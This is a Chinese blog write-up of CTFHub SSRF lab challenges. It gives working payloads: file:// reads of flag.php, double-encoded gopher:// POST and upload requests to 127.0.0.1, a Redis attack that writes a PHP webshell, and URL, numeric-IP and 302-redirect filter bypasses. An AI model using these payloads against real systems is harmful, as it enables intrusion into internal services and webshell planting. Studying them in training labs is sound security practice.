【CTFHUB】SSRF绕过方法之靶场实践(二)

最新推荐文章于 2024-03-18 14:36:06 发布
最新推荐文章于 2024-03-18 14:36:06 发布
阅读量318 收藏
点赞数 1
分类专栏: CTF Recording 文章标签: 网络安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/continuejww/article/details/133212770
版权

SSRF POST请求

提示信息:
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

首先测试了http的服务请求,出现对话框
image.png
输入数值后提示:只能接受来自127.0.0.1的请求

右键查看源码发现key值

image.png

通过file协议读取flag.php页面的源码
构造 Payload:

?url=file:///var/www/html/flag.php

flag.php源码如下

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
	<input type="text" name="key">
	<!-- Debug: key=<?php echo $key;?>-->
</form>

尝试使用gopher 协议向服务器发送 POST 包,构造 gopher协议所需的 POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=fb00a2abc4b635472a398e19c222e665

在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。

需要对构造的请求包进行两次 URL编码:

一、将构造好的请求包进行第一次 URL编码:

image.png

在第一次编码后的,将%0A替换为%0D%0A。
因为 Gopher协议包含的请求数据包中,可能包含有=、&等特殊字符,避免与服务器解析传入的参数键值对混淆,所以对数据包进行 URL编码,这样服务端会把%后的字节当做普通字节。

二、二次URL编码得到如下 Gopher请求内容:

image.png

curl功能向目标发送 POST请求,构造如下Payload:

?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250A%250D%250Akey%253Dfb00a2abc4b635472a398e19c222e665

返回的页面请求如下
image.png

上传文件

提示信息:这次需要上传一个文件到flag.php了.祝你好运

进入到页面中,会看到是文件上传的页面,但是没有提交页面的请求,那么首先就在前端页面构造一个submit的请求方式。
(仿照"浏览"按钮)

点击提交的同时burp抓包

然后将其POST的/flag.php添加地址127.0.0.1,然后再将其整个POST请求包进行URL编码

之后将%0A替换成%0D%0A,进行第二次编码。

然后返回到起始的上传文件页面之后,抓取GET请求包

最后将GET请求包中的目录进行替换,替换成方才二次编码好的数据。之后在前面添加gopher://127.0.0.1:80的地址,注意“_”不可或缺,之后发送请求包就可以得到flag

redies协议

提示:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

1.在kali上面输入命令:

python gophers.py --exploit redis

然后选择攻击模式和构造shell
第一个选项这里我们填写php,因为我们需要的是phpshell
第二个选项可以不填,默认根路径为/var/www/html
第三个就写入我们的shell代码


最后会生成指定的URL编码,认的写入文件名是shell.php 命令参数是qq

进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换

然后二次编码之后,输入payload之后显示504 Gateway Time-out,就代表了我们成功写入shell了,蚁剑连接查看就可以得到flag或者可以用get请求的方式直接回显在页面上

URL Bypass

提示信息:
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧。
利用@符号

构造PAYLOAD

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

提示信息;
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

构造payload

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://017700000001#十六进制


http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=http://2130706433

1

302跳转 Bypass

提示信息:
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

http://127.0.0.1/flag.php  # 将这条链接生成短链接

利用如下生成短链接:
https://www.toolnb.com/tools/duanwangzhi.html

http://challenge-27d5969fefffeb6b.sandbox.ctfhub.com:10800/?url=https://shorturl.at/lwADO

爱吃大米饭'
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的挖掘⽅法与⼀个全回显ssrf的利⽤⽅法
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
CTF 题型 SSRF攻击以及绕过汇总笔记&例题总结
最新发布
qq_39947980的博客
03-18 2065
SSRF攻击方式以及绕过手法总结
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
CTFHub SSRF
LYJ20010728的博客
08-10 653
CTFHub SSRFSSRF简介漏洞攻击方式CTFHub SSRF靶场第一部分(Http、Dict和file等协议的利用)内网访问伪协议读取文件端口扫描 SSRF简介 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端请求安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统,也就是说可以利用一个网络请求的服务,当作跳板进行攻击
CTFhub--SSRF
qq_46874275的博客
05-17 585
~目录~开始内网访问伪协议读取文件端口扫描POST请求 开始 内网访问 提示:尝试访问位于127.0.0.1的flag.php吧 直接url=127.0.0.1/flag.php 伪协议读取文件 提示:尝试去读取一下Web目录下的flag.php吧 URL的伪协议有以下几种: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 读取web目录下的flag.php,利用file:/// url=file:///var/www/html/flag.php
Ctfhub解题 web SSRF(未完待续)
weixin_46703850的博客
03-21 972
Ctfhub解题 web SSRF(未完待续)
CTFHub -web-ssrf总结 (除去fastcgi和redis)超详细
m0_62879498的博客
02-11 2253
CTFHub -web-ssrf 练习总结 一,内网访问 尝试访问位于127.0.0.1的flag.php吧 所以我们可以直接构建url: /?url=http://127.0.0.1/flag.php 进行访问即可成功 ,为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们先尝试 ?url=http://127.0.0.1/flag.php 现访问不见 这道题说白了是让我们访问本地计算机的web文件 所以我们使用 file 协议读取构造: /url=file:///var/ww
初识CTF Day4 CTFHUBSSRF
suxinAL的博客
10-02 2074
前言 这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶 正文 SSRF 内网访问 题目告诉访问127就直接访问下试试,但是没想到这么简单 ?url=127.0.0.1/flag.php 伪协议读取文件 题目提示:尝试去读取一下Web目录下的flag.php吧 可以联想到web目录一般是存放在 var/www/html/ 里面 所以payload如下 ?url=file:///var/www/html/flag.php 进入该页面,查看页面源代码得到flag 端口扫描 题目提示:来来
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 6946
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是一个HTTP POST请求.对了.ssrf是用phpcurl实现的.并且跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,现了flag.php 3
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6074
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
SSRF漏洞内网渗透利用(实例)
墨痕诉清风的博客
10-07 6185
目录 常出现的位置 绕过方式 正则过滤指定网址 内网IP地址绕过(不容许172、10、192开头的地址均不许输入) 常见的攻击协议 实例:ssrf漏洞利用(内网探测、打redis) 一、进行内网探测 、file协议读取文件 三、攻击redis 方法一:通过header CRLF 注入 方法:通过【curl命令】和【gopher协议】远程攻击内网redis 方法三:使用dict协议向Redis数据库写shell Payload 完善修改 四、结合gopher协...
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 4474
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2030
ssrf
[ctf学习]ctfhub技能树-web
小飒的博客
07-05 1550
背景知识 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 方法 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索与GET请求相一致的响应,只不过响应体将不被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应小消息头中的元信息。 3、GET 向特定的资源请求。注意:GET方法不应当被用于产生“副作用”的操作中,例如在Web A
CTFHub技能树 Web-SSRF POST请求
Senimo
07-02 2483
POST请求 hint:这次是一个HTTP POST请求,对了,ssrf是用phpcurl实现的,并且跟踪302跳转油吧骚年。 启动环境,访问页面为空白,查看URL: http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_ 通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框: 查看源码: <form action="/flag.php" method="post"> &l
DAY37:SSRF 漏洞
qq_49433473的博客
08-22 1282
SSRF(Sever Side Request Forgery)—服务器端请求伪造、产生 SSRF 漏洞的函数、SSRF 漏洞可能存在的场景、SSRF 漏洞绕过方式、SSRF 漏洞的危害、SSRF 漏洞防御、小练习
Pikachu靶场SSRF服务器端请求伪造
m0_46467017的博客
08-24 881
SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端请求一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
CTFHub ssrf
07-29
- *3* [CTFHub技能树笔记SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值